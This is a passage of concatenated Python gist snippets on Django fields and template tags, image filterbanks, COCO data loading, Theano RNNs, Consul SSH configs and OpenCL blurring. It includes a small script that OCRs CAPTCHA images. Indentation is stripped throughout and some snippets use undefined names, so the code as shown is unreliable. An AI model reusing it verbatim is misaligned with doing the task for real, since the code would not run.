print "done"
```
#### File: hard-gists/3094847/snippet.py
```python
from django import template
register = template.Library()
@register.filter(name='indent')
def indent_string(val, num_spaces=4):
return val.replace('\n', '\n' + ' '*num_spaces)
```
#### File: hard-gists/3129692/snippet.py
```python
import numpy as np
import matplotlib.pyplot as plt
from itertools import product, chain
from scipy.misc import lena
#from sklearn.externals.joblib import Parallel, delayed
def makeRFSfilters(radius=24, sigmas=[1, 2, 4], n_orientations=6):
""" Generates filters for RFS filterbank.
Parameters
----------
radius : int, default 28
radius of all filters. Size will be 2 * radius + 1
sigmas : list of floats, default [1, 2, 4]
define scales on which the filters will be computed
n_orientations : int
number of fractions the half-angle will be divided in
Returns
-------
edge : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains edge filters on different scales and orientations
bar : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains bar filters on different scales and orientations
rot : ndarray (2, 2*radius+1, 2*radius+1)
contains two rotation invariant filters, Gaussian and Laplacian of
Gaussian
"""
def make_gaussian_filter(x, sigma, order=0):
if order > 2:
raise ValueError("Only orders up to 2 are supported")
# compute unnormalized Gaussian response
response = np.exp(-x ** 2 / (2. * sigma ** 2))
if order == 1:
response = -response * x
elif order == 2:
response = response * (x ** 2 - sigma ** 2)
# normalize
response /= np.abs(response).sum()
return response
def makefilter(scale, phasey, pts, sup):
gx = make_gaussian_filter(pts[0, :], sigma=3 * scale)
gy = make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)
f = (gx * gy).reshape(sup, sup)
# normalize
f /= np.abs(f).sum()
return f
support = 2 * radius + 1
x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]
orgpts = np.vstack([x.ravel(), y.ravel()])
rot, edge, bar = [], [], []
for sigma in sigmas:
for orient in xrange(n_orientations):
# Not 2pi as filters have symmetry
angle = np.pi * orient / n_orientations
c, s = np.cos(angle), np.sin(angle)
rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)
edge.append(makefilter(sigma, 1, rotpts, support))
bar.append(makefilter(sigma, 2, rotpts, support))
length = np.sqrt(x ** 2 + y ** 2)
rot.append(make_gaussian_filter(length, sigma=10))
rot.append(make_gaussian_filter(length, sigma=10, order=2))
# reshape rot and edge
edge = np.asarray(edge)
edge = edge.reshape(len(sigmas), n_orientations, support, support)
bar = np.asarray(bar).reshape(edge.shape)
rot = np.asarray(rot)[:, np.newaxis, :, :]
return edge, bar, rot
def apply_filterbank(img, filterbank):
from scipy.ndimage import convolve
result = []
for battery in filterbank:
response = [convolve(img, filt) for filt in battery]
#response = Parallel(n_jobs=5)(
#delayed(convolve)(img, filt) for filt in battery)
max_response = np.max(response, axis=0)
result.append(max_response)
print("battery finished")
return result
if __name__ == "__main__":
sigmas = [1, 2, 4]
n_sigmas = len(sigmas)
n_orientations = 6
edge, bar, rot = makeRFSfilters(sigmas=sigmas,
n_orientations=n_orientations)
n = n_sigmas * n_orientations
# plot filters
# 2 is for bar / edge, + 1 for rot
fig, ax = plt.subplots(n_sigmas * 2 + 1, n_orientations)
for k, filters in enumerate([bar, edge]):
for i, j in product(xrange(n_sigmas), xrange(n_orientations)):
row = i + k * n_sigmas
ax[row, j].imshow(filters[i, j, :, :], cmap=plt.cm.gray)
ax[row, j].set_xticks(())
ax[row, j].set_yticks(())
ax[-1, 0].imshow(rot[0, 0], cmap=plt.cm.gray)
ax[-1, 0].set_xticks(())
ax[-1, 0].set_yticks(())
ax[-1, 1].imshow(rot[1, 0], cmap=plt.cm.gray)
ax[-1, 1].set_xticks(())
ax[-1, 1].set_yticks(())
for i in xrange(2, n_orientations):
ax[-1, i].set_visible(False)
# apply filters to lena
img = lena().astype(np.float)
filterbank = chain(edge, bar, rot)
n_filters = len(edge) + len(bar) + len(rot)
response = apply_filterbank(img, filterbank)
# plot responses
fig2, ax2 = plt.subplots(3, 3)
for axes, res in zip(ax2.ravel(), response):
axes.imshow(res, cmap=plt.cm.gray)
axes.set_xticks(())
axes.set_yticks(())
ax2[-1, -1].set_visible(False)
plt.show()
```
#### File: hard-gists/3158388/snippet.py
```python
from django.core import exceptions
from django.conf import settings
from django.db.models import fields
from django.utils.translation import ugettext as _
from south.modelsinspector import add_introspection_rules
from django.db.models.fields.related import OneToOneField
__version__ = "1.1"
__author__ = "<NAME>"
__author__ = "<NAME> @ BeeDesk"
class BigIntegerField(fields.IntegerField):
def db_type(self, connection):
if settings.DATABASE_ENGINE.endswith('mysql'):
return "bigint"
elif settings.DATABASE_ENGINE.endswith('oracle'):
return "NUMBER(19)"
elif settings.DATABASE_ENGINE.endswith('postgres'):
return "bigint"
elif settings.DATABASE_ENGINE.endswith('sqlite3'):
return super(BigIntegerField, self).db_type(connection)
else:
            raise NotImplementedError
def get_internal_type(self):
return "BigIntegerField"
def to_python(self, value):
if value is None:
return value
try:
return long(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
_("This value must be a long integer."))
class BigAutoField(fields.AutoField):
def db_type(self, connection):
if settings.DATABASE_ENGINE.endswith('mysql'):
return "bigint AUTO_INCREMENT"
elif settings.DATABASE_ENGINE.endswith('oracle'):
return "NUMBER(19)"
elif settings.DATABASE_ENGINE.endswith('postgres'):
return "bigserial"
elif settings.DATABASE_ENGINE.endswith('sqlite3'):
return super(BigAutoField, self).db_type(connection)
else:
            raise NotImplementedError
def get_internal_type(self):
return "BigAutoField"
def to_python(self, value):
if value is None:
return value
try:
return long(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
_("This value must be a long integer."))
class BigForeignKey(fields.related.ForeignKey):
def db_type(self, connection):
rel_field = self.rel.get_related_field()
# next lines are the "bad tooth" in the original code:
if (isinstance(rel_field, BigAutoField) or
(not connection.features.related_fields_match_type and
isinstance(rel_field, BigIntegerField))):
# because it continues here in the django code:
# return IntegerField().db_type()
# thereby fixing any AutoField as IntegerField
return BigIntegerField().db_type(connection)
return rel_field.db_type(connection)
class BigOneToOneField(BigForeignKey, OneToOneField):
"""
If you use subclass model, you might need to name
the `ptr` field explicitly. This is the field type you
might want to use. Here is an example:
class Base(models.Model):
title = models.CharField(max_length=40, verbose_name='Title')
class Concrete(Base):
base_ptr = fields.BigOneToOneField(Base)
ext = models.CharField(max_length=12, null=True, verbose_name='Ext')
"""
pass
if 'south' in settings.INSTALLED_APPS:
add_introspection_rules([], ['^common\.fields\.BigIntegerField'])
add_introspection_rules([], ['^common\.fields\.BigAutoField'])
add_introspection_rules([], ['^common\.fields\.BigForeignKey'])
add_introspection_rules([], ['^common\.fields\.BigOneToOneField'])
```
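A minimal usage sketch (hypothetical `models.py`; it assumes the module above is importable as `common.fields`, the dotted path the South introspection rules reference):
```python
# hypothetical example, not part of the original gist
from django.db import models
from common import fields  # assumes the snippet above is saved as common/fields.py

class Account(models.Model):
    # 64-bit auto-incrementing primary key instead of Django's default 32-bit one
    id = fields.BigAutoField(primary_key=True)
    balance = fields.BigIntegerField(default=0)

class Invoice(models.Model):
    # foreign key column sized to match the BigAutoField it points at
    account = fields.BigForeignKey(Account)
```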
#### File: hard-gists/3181989/snippet.py
```python
import sys
import StringIO
import requests
import PIL.Image
import tesserwrap
#: https://github.com/gregjurman/tesserwrap
tesseract = tesserwrap.tesseract()
def distinguish_captcha(image_url, show_origin_image=True):
#: preprocess
image_bytes = requests.get(image_url).content
origin_image = PIL.Image.open(StringIO.StringIO(image_bytes))
image = origin_image.point(lambda p: p * 1.5)\
.point(lambda p: 255 if p > 200 else 0)\
.convert("1")
#: distinguish the text
text = tesseract.ocr_image(image)
#: show the origin image
if show_origin_image:
origin_image.show()
return text.strip()
def main():
url = raw_input("Please input the url of captcha:\n > ").strip()
print >> sys.stderr, ">>> Press Ctrl + C to stop."
print >> sys.stderr, ">>> Press any key to continue."
while True:
raw_input()
print distinguish_captcha(url)
if __name__ == "__main__":
try:
        main()
except KeyboardInterrupt:
print >> sys.stderr, ">>> Exit."
```
#### File: hard-gists/3287286/snippet.py
```python
import sys, copy, os, itertools
import rpy2.robjects as robjects
import rpy2.rinterface as rinterface
from rpy2.robjects.vectors import SexpVector, ListVector
from rpy2.robjects.robject import RObjectMixin, RObject
import rpy2.robjects as robj
import numpy as np
import pandas.rpy.common as rcom
import pandas as pd
NA_TYPES = rcom.NA_TYPES
VECTOR_TYPES = rcom.VECTOR_TYPES
baseenv_ri = rinterface.baseenv
globalenv_ri = rinterface.globalenv
def my_ri2py(o):
res = None
try:
rcls = o.do_slot("class")
except LookupError, le:
rcls = [None]
if isinstance(o, SexpVector):
if 'xts' in rcls:
res = convert_xts_to_df(o)
if res is None:
res = robjects.default_ri2py(o)
return res
def convert_xts_to_df(o):
"""
Will convert xts objects to DataFrame
"""
dates = o.do_slot('index')
dates = np.array(dates, dtype=np.dtype("M8[s]"))
res = robjects.default_ri2py(o)
df = rcom.convert_robj(res)
df.index = dates
return df
robjects.conversion.ri2py = my_ri2py
def pd_py2ri(o):
"""
"""
res = None
if isinstance(o, pd.DataFrame) and isinstance(o.index, pd.DatetimeIndex):
res = convert_df_to_xts(o)
if res is None:
res = robjects.default_py2ri(o)
return res
def convert_df_to_xts(df, strings_as_factors=False):
r_dataframe = XTS(df)
return r_dataframe
class XTS(RObject):
""" R 'as.xts'.
"""
def __init__(self, df):
""" Create a xts.
"""
self.rdf = None
if isinstance(df, pd.DataFrame):
rdf = rcom.convert_to_r_dataframe(df)
self.rdf = rdf
xts = baseenv_ri.get("as.xts").rcall(tuple([('x', rdf)]), globalenv_ri)
super(XTS, self).__init__(xts)
else:
raise ValueError("Currently only supporting DataFrames")
def __repr__(self):
return self.rdf.__repr__()
robjects.conversion.py2ri = pd_py2ri
```
#### File: hard-gists/329142c1740500bd3797/snippet.py
```python
from CoreLocation import CLLocationManager, kCLDistanceFilterNone, kCLLocationAccuracyThreeKilometers
from Foundation import NSRunLoop, NSDate, NSObject
is_enabled = CLLocationManager.locationServicesEnabled()
is_authorized = CLLocationManager.authorizationStatus()
class MyLocationManagerDelegate(NSObject):
def init(self):
self = super(MyLocationManagerDelegate, self).init()
if not self:
return
self.locationManager = CLLocationManager.alloc().init()
self.locationManager.setDelegate_(self)
self.locationManager.setDistanceFilter_(kCLDistanceFilterNone)
self.locationManager.setDesiredAccuracy_(kCLLocationAccuracyThreeKilometers)
self.locationManager.startUpdatingLocation()
return self
def locationManager_didUpdateToLocation_fromLocation_(self, manager, newloc, oldloc):
print "NEW:", newloc.description()
if oldloc is not None:
print "OLD:", oldloc.description()
else:
print "OLD: <None>"
def locationManager_didFailWithError_(self, manager, err):
print "ERR:", err.description()
def main():
finder = MyLocationManagerDelegate.alloc().init()
for x in range(5):
print "loop", x
        NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(10))
if __name__ == "__main__":
    main()
```
#### File: hard-gists/33e2172bafbb5dd794ab/snippet.py
```python
try:
import Queue
except ImportError:
import queue as Queue
import threading
import time
from matplotlib.path import Path
from PIL import Image
import numpy as np
import warnings
import os
import itertools
from retrying import retry
# Get pycocotools from https://github.com/pdollar/coco/archive/master.zip
# Go to coco-master/PythonAPI
# python setup.py build
# python setup.py install
from pycocotools.coco import COCO
from pycocotools import mask as cocomask
def fetch_from_COCO(filenames, img_list,
coco_info,
resize_images=False, resize_size=-1,
load_categories=['person']):
images = []
masks = []
assert len(filenames) == len(img_list)
for n, img_el in enumerate(img_list):
# load image
if not os.path.exists(filenames[n]):
print('Image %s is missing' % filenames[n])
continue
pth = filenames[n]
im = Image.open(pth)
coco, catIds, imgIds = coco_info
# load the annotations and build the mask
anns = coco.loadAnns(coco.getAnnIds(
imgIds=img_el['id'], catIds=catIds, iscrowd=None))
mask = np.zeros(im.size).transpose(1, 0)
for ann in anns:
catId = ann['category_id']
if type(ann['segmentation']) == list:
# polygon
for seg in ann['segmentation']:
# xy vertex of the polygon
poly = np.array(seg).reshape((len(seg)/2, 2))
closed_path = Path(poly)
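                    # rasterize the polygon: build the coordinates of every pixel
                    # centre and keep those that fall inside the closed path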
nx, ny = img_el['width'], img_el['height']
x, y = np.meshgrid(np.arange(nx),
np.arange(ny))
x, y = x.flatten(), y.flatten()
points = np.vstack((x, y)).T
grid = closed_path.contains_points(points)
if np.count_nonzero(grid) == 0:
warnings.warn(
'One of the annotations that compose the mask '
'of %s was empty' % img_el['file_name'],
RuntimeWarning)
grid = grid.reshape((ny, nx))
mask[grid] = catId
else:
# mask
if type(ann['segmentation']['counts']) == list:
rle = cocomask.frPyObjects(
[ann['segmentation']],
img_el['height'], img_el['width'])
else:
rle = [ann['segmentation']]
grid = cocomask.decode(rle)[:, :, 0]
grid = grid.astype('bool')
mask[grid] = catId
# zero_pad
if resize_images:
rx, ry = resize_size
# resize (keeping proportions)
[x, y] = im.size
dx = float(rx)/x
dy = float(ry)/y
ratio = min(dx, dy)
x = int(x * ratio)
y = int(y * ratio)
# workaround for PIL problems..
@retry(stop_max_attempt_number=7, wait_fixed=2000)
def res(im, x, y):
return im.resize((x, y), Image.ANTIALIAS)
im = res(im, x, y)
# mask = mask / numpy.max(mask) * 255.0 --> only visualization
mask = Image.fromarray(mask.astype('uint8'))
mask = mask.resize((x, y), Image.NEAREST)
tmp = im
im = Image.new("RGB", (rx, ry))
im.paste(tmp, ((rx-x)/2, (ry-y)/2))
tmp = mask
# 80 obj categories
mask = Image.new("L", (rx, ry))
mask.paste(tmp, ((rx-x)/2, (ry-y)/2))
images.append(np.asarray(im))
masks.append(np.asarray(mask))
return images, masks, filenames
class COCOThread(threading.Thread):
"""Image Thread"""
def __init__(self, queue, out_queue):
threading.Thread.__init__(self)
self.queue = queue
self.out_queue = out_queue
def run(self):
while True:
# Grabs image path from queue
filenames, image_list, coco_info = self.queue.get()
try:
# Grab image
# print('reading image', image_path)
image_group, mask_group, filenames = fetch_from_COCO(
filenames, image_list, coco_info)
# Place image in out queue
self.out_queue.put((image_group, mask_group))
# Signals to queue job is done
self.queue.task_done()
except IOError:
print("Image in image_group corrupted!")
print(image_group)
class MSCOCO_dataset(object):
def __init__(self, minibatch_size=3, which_set="train", coco_path="/data/lisa/data/COCO/",
load_categories=['person']):
if which_set == "train":
partial_path = "train2014"
elif which_set == "valid":
partial_path = "val2014"
elif which_set == "test2014":
partial_path = "test2014"
elif which_set == "test2015":
partial_path = "test2015"
else:
raise ValueError("Unknown setting for which_set %s" % which_set)
base_path = os.path.join(coco_path, "images", partial_path)
ann_path = '%s/annotations_v1.0.3/instances_%s.json' % (coco_path,
partial_path)
filenames = []
# initialize COCO api for instance annotations
coco = COCO(ann_path)
# get all images containing the given categories
catIds = coco.getCatIds(catNms=load_categories)
imgIds = coco.getImgIds(catIds=catIds)
img_list = coco.loadImgs(imgIds)
self.coco_info = (coco, catIds, imgIds)
for img_el in img_list:
# load image
filename = '%s/%s' % (base_path, img_el['file_name'])
if not os.path.exists(filename):
print('Image %s is missing' % img_el['file_name'])
else:
filenames.append(filename)
assert(len(filenames) == len(img_list))
self.image_list = img_list
self.filenames = filenames
self.n_per_epoch = len(filenames)
self.n_samples_seen_ = 0
# Test random order
# random.shuffle(self.image_paths)
self.buffer_size = 5
self.minibatch_size = minibatch_size
self.input_qsize = 50
self.min_input_qsize = 10
if len(self.image_list) % self.minibatch_size != 0:
print("WARNING: Sample size not an even multiple of minibatch size")
print("Truncating...")
self.image_list = self.image_list[:-(
len(self.image_list) % self.minibatch_size)]
self.filenames = self.filenames[:-(
len(self.filenames) % self.minibatch_size)]
assert len(self.image_list) % self.minibatch_size == 0
assert len(self.filenames) % self.minibatch_size == 0
self.grouped_image_list = zip(*[iter(self.image_list)] *
self.minibatch_size)
self.grouped_filenames = zip(*[iter(self.filenames)] *
self.minibatch_size)
# Infinite...
self.grouped_elements = itertools.cycle(zip(self.grouped_filenames,
self.grouped_image_list,
[self.coco_info] * len(
self.grouped_image_list)))
self.queue = Queue.Queue()
self.out_queue = Queue.Queue(maxsize=self.buffer_size)
self._init_queues()
def _init_queues(self):
for i in range(1):
self.it = COCOThread(self.queue, self.out_queue)
self.it.setDaemon(True)
self.it.start()
# Populate queue with some paths to image data
for n, _ in enumerate(range(self.input_qsize)):
group = self.grouped_elements.next()
self.queue.put(group)
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
return self._step()
def reset(self):
self.n_samples_seen_ = 0
def _step(self):
if self.n_samples_seen_ >= self.n_per_epoch:
self.reset()
raise StopIteration("End of epoch")
image_group = self.out_queue.get()
self.n_samples_seen_ += self.minibatch_size
if self.queue.qsize() <= self.min_input_qsize:
for image_path_group in range(self.input_qsize):
group = self.grouped_elements.next()
self.queue.put(group)
return image_group
if __name__ == "__main__":
# Example usage
ds = MSCOCO_dataset()
start = time.time()
n_minibatches_to_run = 100
itr = 1
while True:
image_group = ds.next()
# time.sleep approximates running some model
time.sleep(1)
stop = time.time()
tot = stop - start
print("Threaded time: %s" % (tot))
print("Minibatch %s" % str(itr))
print("Time ratio (s per minibatch): %s" % (tot / float(itr)))
itr += 1
# test
if itr >= n_minibatches_to_run:
break
```
#### File: hard-gists/3454877/snippet.py
```python
import os, shlex
from twisted.internet import defer, utils, reactor, threads
from twisted.python import log, failure
from buildbot.buildslave import AbstractBuildSlave, AbstractLatentBuildSlave
from buildbot import config
class ScriptedLatedBuildSlave(AbstractLatentBuildSlave):
def __init__(self, name, password, start_script, stop_script, max_builds=None, notify_on_missing=[],
missing_timeout=60*20, build_wait_timeout=60*10, properties={}, locks=None):
AbstractLatentBuildSlave.__init__(self, name, password, max_builds, notify_on_missing,
missing_timeout, build_wait_timeout, properties, locks)
self.name = name
self.start_script = shlex.split(start_script)
self.stop_script = shlex.split(stop_script)
@defer.inlineCallbacks
def start_instance(self, build):
log.msg("Attempting to start '%s'" % self.name)
retval = yield utils.getProcessValue(self.start_script[0], self.start_script[1:])
defer.returnValue(retval == 0)
@defer.inlineCallbacks
def stop_instance(self, fast=False):
log.msg("Attempting to stop '%s'" % self.name)
retval = yield utils.getProcessValue(self.stop_script[0], self.stop_script[1:])
log.msg("slave destroyed (%s): Forcing its connection closed." % self.name)
yield AbstractBuildSlave.disconnect(self)
log.msg("We forced disconnection (%s), cleaning up and triggering new build" % self.name)
self.botmaster.maybeStartBuildsForSlave(self.name)
defer.returnValue(retval == 0)
```
#### File: hard-gists/347596/snippet.py
```python
import time
from django.http import HttpResponse
from django.utils.http import http_date
AJAX_NEGATIVE_CHECK_EXPIRES = 60 # object is still available
AJAX_POSITIVE_CHECK_EXPIRES = 60*10 # if object is not available (or taken)
def check_ajax(request):
# do stuff here
timeout = AJAX_NEGATIVE_CHECK_EXPIRES if avail else AJAX_POSITIVE_CHECK_EXPIRES
response = HttpResponse(json_result, mimetype='application/json')
response['Expires'] = http_date(time.time() + timeout)
return response
```
#### File: hard-gists/353499f2e6e407883b32/snippet.py
```python
import numpy as np
from theano import config, shared
from theano import scan
from theano import tensor as T
def load_mnist():
from gzip import open
from cPickle import load
from os.path import join, dirname
module_path = dirname(__file__)
with open(join(module_path, 'mnist.pkl.gz')) as data_file:
return load(data_file)
def shared_identity(size, scale=1):
W = scale * np.eye(*size)
return shared(np.asarray(W, dtype=config.floatX))
def shared_gaussian(size, scale=0.001):
W = np.random.normal(scale=scale, size=size)
return shared(np.asarray(W, dtype=config.floatX))
def shared_constant(size, scale=0):
W = np.ones(shape=size, dtype=config.floatX) * scale
return shared(np.asarray(W, dtype=config.floatX))
class RecurrentLayer(object):
def __init__(self, input_size, output_size):
self.W = shared_gaussian((input_size, output_size))
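        # recurrent weights start as the identity matrix (the IRNN initialization
        # for ReLU RNNs), so the hidden state initially just copies itself forward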
self.W_hidden = shared_identity((output_size, output_size))
self.h = shared_constant((batch_size, output_size))
self.params = [self.W, self.W_hidden]
def __call__(self, x, h):
linear = T.dot(x, self.W) + T.dot(h, self.W_hidden)
return T.switch(linear > 0, linear, 0)
class SoftmaxLayer(object):
def __init__(self, input_size, output_size):
self.W = shared_gaussian((input_size, output_size))
self.b = shared_constant(output_size)
self.params = [self.W, self.b]
def __call__(self, x):
return T.nnet.softmax(T.dot(x, self.W) + self.b)
def get_cost(x, y):
x = x.T.reshape((784, -1, 1))
results, updates = scan(recurrent_layer, x, recurrent_layer.h)
predict_proba = softmax_layer(results[-1])
return T.nnet.categorical_crossentropy(predict_proba, y).mean(), \
T.mean(T.neq(T.argmax(predict_proba, axis=1), y))
def get_updates(cost, params):
    grads = T.grad(cost, params)
    return [(param, param - learning_rate * T.clip(grad, -1, 1))
            for param, grad in zip(params, grads)]
def get_givens(X, y):
batch_start = i * batch_size
batch_end = (i+1) * batch_size
X = shared(np.asarray(X, config.floatX))
y = shared(np.asarray(y, 'int64'))
return {x: X[batch_start:batch_end],
t: y[batch_start:batch_end]}
if __name__ == '__main__':
X, y = load_mnist()[0]
from theano import tensor as T
x = T.matrix()
t = T.lvector()
i = T.lscalar()
learning_rate = 1e-8
batch_size = 16
recurrent_layer = RecurrentLayer(1, 100)
softmax_layer = SoftmaxLayer(100, 10)
cost, prediction_error = get_cost(x, t)
params = recurrent_layer.params + softmax_layer.params
updates = get_updates(cost, params)
givens = get_givens(X, y)
from theano import function
    fit = function([i], prediction_error, updates=updates, givens=givens)
n_batches = len(X) / batch_size
n_epochs = 1000
for epoch in range(n_epochs):
cost = []
for batch in range(n_batches):
cost.append(fit(batch))
print np.mean(cost)
```
#### File: hard-gists/3599025/snippet.py
```python
from urllib.request import urlopen
import json
gist_description = "does stuff"
gist_filename = 'file1_upload_to_github.py'
gist_body = """\
line1
line2
line3
line4
"""
def main_function(gist_filename, gist_description, gist_body):
gist_post_data = { 'description': gist_description,
'public': True,
'files': {gist_filename: {'content': gist_body}}}
json_post_data = json.dumps(gist_post_data).encode('utf-8')
def get_gist_url(found_json):
wfile = json.JSONDecoder()
wjson = wfile.decode(found_json)
print('https://gist.github.com/' + wjson['id'])
def upload_gist():
print('sending')
url = 'https://api.github.com/gists'
json_to_parse = urlopen(url, data=json_post_data)
print('received response from server')
        found_json = json_to_parse.read().decode()
get_gist_url(found_json)
upload_gist()
main_function(gist_filename, gist_description, gist_body)
```
#### File: hard-gists/3685134/snippet.py
```python
import re
from django import forms
from django.db import models
class ColourFormField(forms.IntegerField):
default_error_messages = {
'invalid': 'Enter a valid colour value: e.g. "#ff0022"',
}
def __init__(self, *args, **kwargs):
super(ColourFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if value == '' and not self.required:
return u''
if not re.match('^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$', value):
raise forms.ValidationError(self.error_messages['invalid'])
value = int(value[1:], 16)
super(ColourFormField, self).clean(value)
return value
class ColourField(models.PositiveIntegerField):
description = "HEX value for a colour"
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 6
super(ColourField, self).__init__(*args, **kwargs)
    def to_python(self, value):
        value = super(ColourField, self).to_python(value)
        try:
            # zero-pad to six hex digits so e.g. 255 round-trips as "#0000FF"
            return "#%06X" % value
        except TypeError:
            return None
def get_prep_value(self, value):
try:
# hex to int, save the int representation of the colour hex code to the database
return value
except ValueError:
return None
def formfield(self, *args, **kwargs):
kwargs['form_class'] = ColourFormField
return super(ColourField, self).formfield(*args, **kwargs)
```
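A small usage sketch (hypothetical model; it assumes the field classes above are importable, e.g. saved locally as `fields.py`):
```python
# hypothetical example, not part of the original gist
from django.db import models
from fields import ColourField  # wherever the snippet above is saved

class Theme(models.Model):
    name = models.CharField(max_length=50)
    # accepts "#FF0022" in forms, stores the integer 0xFF0022 in the database
    background = ColourField()
```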
#### File: hard-gists/36e652488563ab23ea04/snippet.py
```python
import argparse
import glob
import json
import os
import shutil
from http.client import HTTPConnection
class Client(object):
def __init__(self, host):
self.connection = HTTPConnection(host, timeout=10)
def open(self, method, url, body=None, headers={}):
self.connection.request(method, url, body, headers)
response = self.connection.getresponse()
return json.loads(response.read().decode())
def get(self, url):
return self.open('GET', url)
class SshHost(object):
def __init__(self, host, ssh_user, hostname):
self.host = host
self.ssh_user = ssh_user
self.hostname = hostname
class Inventory(object):
def __init__(self, ssh_user):
self.services = {}
self.ssh_user = ssh_user
def add_service(self, dc, name, address):
service = '%s-%s' % (dc, name)
self.services.setdefault(service, [])
host = '%s-%s' % (service, address.replace('.', '-'))
ssh_host = SshHost(host, self.ssh_user, address)
self.services[service].append(ssh_host)
def __iter__(self):
for services in self.services.values():
for ssh_host in services:
yield ssh_host
class App(object):
def __init__(self, consul, ssh_user, merge):
self.client = Client(consul)
self.merge = merge
self.inventory = Inventory(ssh_user)
def get_datacenters(self):
return self.client.get('/v1/catalog/datacenters')
def get_nodes(self, dc=''):
return self.client.get('/v1/catalog/nodes?dc=%s' % dc)
def get_node(self, node, dc=''):
return self.client.get('/v1/catalog/node/%s?dc=%s' % (node['Node'], dc))
def get_node_services(self, node):
return [s['Service'] for s in node['Services'].values()]
def get_inventory(self):
for dc in self.get_datacenters():
for node in self.get_nodes(dc):
node = self.get_node(node, dc)
for service in self.get_node_services(node):
self.inventory.add_service(dc, service, node['Node']['Address'])
def write_config(self):
ssh_dir = os.path.join(os.environ['HOME'], '.ssh')
main_config_path = os.path.join(ssh_dir, 'config')
main_config_backup_path = os.path.join(ssh_dir, 'config.old')
consul_config_path = os.path.join(ssh_dir, 'consul.config')
merge_files = os.path.join(ssh_dir, self.merge)
with open(consul_config_path, 'w') as f:
for ssh_host in self.inventory:
f.write('Host %s\n' % ssh_host.host)
f.write(' Hostname %s\n' % ssh_host.hostname)
f.write(' User %s\n\n' % ssh_host.ssh_user)
shutil.copyfile(main_config_path, main_config_backup_path)
with open(main_config_path, 'w') as ssh_config:
for fn in glob.glob(merge_files):
with open(fn, 'r') as config:
ssh_config.write(config.read())
print('config written to %s' % main_config_path)
def run(self):
self.get_inventory()
self.write_config()
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-c', '--consul', default='localhost:8500',
help='The Consul host to connect to. Defaults to localhost:8500')
parser.add_argument(
'-u', '--ssh-user', default=os.getlogin(),
help='The SSH user to specify for all hosts. Defaults to %s' % os.getlogin())
parser.add_argument(
'-m', '--merge', default='*.config',
help='A glob pattern to specify files to collect and merge into the main config. '
'Defaults to "*.config"')
args = parser.parse_args()
App(args.consul, args.ssh_user, args.merge).run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/3714115/snippet.py
```python
import re
from django.template import Library, Node, TemplateSyntaxError
from urlparse import urlparse, parse_qsl, urlunparse
from django.utils.encoding import smart_str
from urllib import urlencode
register = Library()
@register.tag
def qurl(parser, token):
"""
Append, remove or replace query string parameters from an url (preserve order)
{% qurl url [param]* [as <var_name>] %}
param:
name=value: replace all values of name by one value
name=None: remove all values of name
name+=value: append a new value for name
name-=value: remove the value of name with the value
Example::
{% qurl '/search?page=1&color=blue&color=green' order='name' page=None color+='red' color-='green' %}
Output: /search?color=blue&order=name&color=red
{% qurl request.get_full_path order='name' %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument (url)" % bits[0])
url = parser.compile_filter(bits[1])
asvar = None
bits = bits[2:]
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
qs = []
if len(bits):
kwarg_re = re.compile(r"(\w+)(\-=|\+=|=)(.*)")
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError("Malformed arguments to url tag")
name, op, value = match.groups()
qs.append((name, op, parser.compile_filter(value),))
return QURLNode(url, qs, asvar)
class QURLNode(Node):
"""Implements the actions of the qurl tag."""
def __init__(self, url, qs, asvar):
self.url = url
self.qs = qs
self.asvar = asvar
def render(self, context):
urlp = list(urlparse(self.url.resolve(context)))
qp = parse_qsl(urlp[4])
for name, op, value in self.qs:
name = smart_str(name)
value = value.resolve(context)
value = smart_str(value) if value is not None else None
if op == '+=':
qp = filter(lambda (n, v): not(n == name and v == value), qp)
qp.append((name, value,))
elif op == '-=':
qp = filter(lambda (n, v): not(n == name and v == value), qp)
elif op == '=':
qp = filter(lambda (n, v): not(n == name), qp)
if value is not None:
qp.append((name, value,))
urlp[4] = urlencode(qp, True)
url = urlunparse(urlp)
if self.asvar:
context[self.asvar] = url
return ''
else:
return url
```
#### File: hard-gists/3735779/snippet.py
```python
import sys
import time
from PyQt4 import QtCore
from PyQt4 import QtGui
import pyopencl as cl
import numpy
CL_SOURCE = '''//CL//
__kernel void convert(
read_only image2d_t src,
write_only image2d_t dest,
const int width,
const int height
)
{
const sampler_t sampler = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP_TO_EDGE | CLK_FILTER_NEAREST;
int2 pos = (int2)(get_global_id(0), get_global_id(1));
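    // 3x3 binomial blur (Gaussian approximation): weights 1-2-1 / 2-4-2 / 1-2-1,
    // normalized by 16 below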
uint4 pix = 4 * read_imageui(src, sampler, pos);
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y - 1));
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y + 1));
pix += read_imageui(src, sampler, (int2)(pos.x , pos.y - 1)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x , pos.y + 1)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y - 1));
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y + 1));
//pix /= (uint4)(16, 16, 16, 16);
pix.x /= 16;
pix.y /= 16;
pix.z /= 16;
pix.w /= 16;
write_imageui(dest, pos, pix);
}
'''
class Widget(QtGui.QWidget):
def __init__(self, parent=None):
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
self.prg = cl.Program(self.ctx, CL_SOURCE).build()
